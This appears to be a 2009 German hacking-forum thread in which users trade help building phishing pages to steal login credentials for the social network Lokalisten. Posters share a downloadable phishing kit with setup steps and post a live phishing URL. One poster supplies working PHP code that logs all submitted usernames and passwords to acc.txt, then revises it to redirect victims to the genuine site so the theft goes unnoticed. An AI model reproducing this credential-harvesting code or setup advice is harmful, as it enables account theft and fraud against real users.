ja hatte die send.php verändert, ka irgendwie gings nicht schaue es mir nochmal an, danke !!!
So danke nochmal habe jetzt die möglichkeit mit dem php script das eine "log.txt" datei erstellt gemacht, aber in der log-datei erhalte ich nur
ohne Inhalt...weis nicht was da falsch ist :-(Benutzer:
Passwort:
Benutzer:
Passwort:
So, nachdem ich dem letzten Angebot eines Users einen Rapidshare Acc gegeben habe der sich aber irgendwie ncihtmehr meldet, es aber echt wichtig ist möchte ich nochmal fragen ob mir jemand helfen kann solch eine Phsishing Seite zu erstellen !
Hab jetzt eine Site mit MySQL erstellt die auch soweitgehend funktioniert das der Benutzername gesendet wird, jedoch muss sich in einem der Scripte ein Fehler befinden da das Passwort Textfeld immer leer bleibt :-( ...
Die Scripte sind alle vollständig auf meinem Webspace bei IDOO hochgeladen, der jenige der sich damit auskennt müsste sich eben nur kurz die Scripte anschaun und nachsehen warum ich den Benutzernamen erhalte jedoch bei Passwort nichts steht ?!?!?
BIETE FÜR DEN DER MIT HILFT WIEDER EINEN RAPIDSHARE ACCOUNT AN !!!!
lg
Ergebnis 11 bis 19 von 19
-
16.06.2009, 20:42 #11Anfänger
- Registriert seit
- 28.10.2008
- Beiträge
- 27
Geändert von 2533 (21.06.2009 um 15:55 Uhr) Grund: Automerged Doublepost
-
13.07.2009, 10:32 #12Anfänger
- Registriert seit
- 13.06.2009
- Beiträge
- 21
hi, auch wenn der beitrag schon älter ist, ich brauche nur noch bei der send.php
meine e-mail adresse, statt dem markierten bereich im screenshot einfügen, oder?
-
13.07.2009, 10:36 #13Wicked Wonderland
- Registriert seit
- 08.07.2007
- Beiträge
- 434
Ja. Wie soll das script denn sonst wissen wohin es das email schicken soll? Ein bisschen überlegen sollte man schon noch
Geändert von VeN0m (13.07.2009 um 12:14 Uhr) Grund: Vollquote des Vorposters entfernt!
Tu peut t'le mettre dans l'cul.
-
13.07.2009, 10:41 #14Anfänger
- Registriert seit
- 13.06.2009
- Beiträge
- 21
hab ich ja (eigentlich) gemacht, aber beim testen kommt keine e-mail an, kann es an web.de liegen?
ich habe es jetzt noch mit freenet probiert, geht auch nicht, hier ist der link zur phishing page, was habe ich falsch gemacht?
http://www.lokalistenwelt.de.tp/Geändert von Stephen_KinG (13.07.2009 um 11:25 Uhr) Grund: Automerged Doublepost
-
13.07.2009, 11:38 #15Gesperrt
- Registriert seit
- 05.09.2008
- Beiträge
- 654
Falls noch wer ne Lokalisten Phishing Page braucht, ich hätte schnell eine (einfache) gemacht:http://rapidshare.com/files/255289334/lokalisten.rar
Einfach den Lokalisten Ordner auf nen FTP hauen und alle Files auf 777 modden.
mfg der_Dude
-
13.07.2009, 11:46 #16Anfänger
- Registriert seit
- 13.06.2009
- Beiträge
- 21
hi, vielen dank für die schnelle antwort, klappt jetzt auch wunder bar, allerdings wird die Fehlermeldung, das die Anmeldung fehlgeschlagen ist, schon von anfang an agezeigt.
Kann es an der "777" liegen, das ich beim ersten versuch keine e-mail erhalten habe, ist es nötig auch dort die dateiberechtigung zu setzen?
also nochmal getestet mit den "777", funktioniert auch nicht, dann habe ich die login.php von dude umbenannt in send.php und zusammen mit den daten von dem ersten download auf meinem ftp hoch geladen, leider ist es nicht so einfach, denn es wird zwar eine acc.txt datei erstellt, jedoch ohne inhalt.
Wenigstens habe ich mir gedanken gemacht....
@dude bekommst du das hin mit dem falschen login, ansonsten klappt deine page sehr gut.Geändert von Stephen_KinG (13.07.2009 um 12:07 Uhr) Grund: Automerged Doublepost
-
13.07.2009, 12:18 #17Kevin Lee Poulsen
- Registriert seit
- 30.12.2008
- Beiträge
- 1.270
CHMod sind die Rechte der Datei. 777 heißt, dass _jeder_ lesen, schreiben und ausführen darf. Das heißt: Die Welt (jedermann), der Besitzer und die Besitzergruppe.
Die Rechte müssen zumindest so stehen, dass "world" (=jedermann) alles darf. Obwohl ausführen soweit ich weiß nicht nötig ist.
Ich denke aber eher, dass es in diesem Fall an den Scripten oder an Dir liegt. Ersetzt sonst mal die send.php gegen den einfachen Code:
Obwohl ich ehrlich gesagt nicht glaube, dass Dude sein Code falsch ist.PHP-Code:<?php
$handle = fopen("acc.txt","a");
foreach($_POST AS $key => $value) {
fwrite($handle,$key."=".$value."\r\n");
}
fwrite($handle,"\r\n");
fclose($handle);
?>Come to the dark side - We have cookies
-
13.07.2009, 13:20 #18Anfänger
- Registriert seit
- 13.06.2009
- Beiträge
- 21
der code von dude war nicht falsch, das problem war, wenn man auf die seite geht stand bereits da das die anmeldung fehlgeschlagen ist, hat man es trotzdem versucht, bekam ich die daten.
Aber dein code ist mit der page von wui kompatibel, allerdings klappt dann die weiterleitung zur original seite nicht mehr
also kurz
1. wui seine page sieht gut aus und die weiterleitung zur orignalen klappt, allerdings bekomm ich keine e-mail
2. bei dude seiner page bekomme ich die login daten, allerdings steht noch vor dem versuch des opfers sich anzumelden bereits da, das die anmeldung fehlgeschlagen ist.
3. wenn ich die seite von wui benutze und die send.php von power-sven sieht die seite gut aus, ich bekomme auch die daten als acc.txt, allerdings bekommt das opfer nur ne weiße seite, also weder ne fehlermeldung noch die Weiterleitung zur Originalen Seite.
schonmal Danke für eure Unterstüzung
-
13.07.2009, 18:01 #19Kevin Lee Poulsen
- Registriert seit
- 30.12.2008
- Beiträge
- 1.270
Ja, weil ich die Weiterleitung vergaß, sorry
.
Oben in den Code kommt noch ein Header-Befehl.
Bei ZIELSEITE schreibst Du unklusive http:// die Zielurl hinPHP-Code:<?php
header("location: ZIELSEITE");
$handle = fopen("acc.txt","a");
foreach($_POST AS $key => $value) {
fwrite($handle,$key."=".$value."\r\n");
}
fwrite($handle,"\r\n");
fclose($handle);
?>. Dann leitet das Ding auch weiter 
.
Come to the dark side - We have cookies
Zitieren
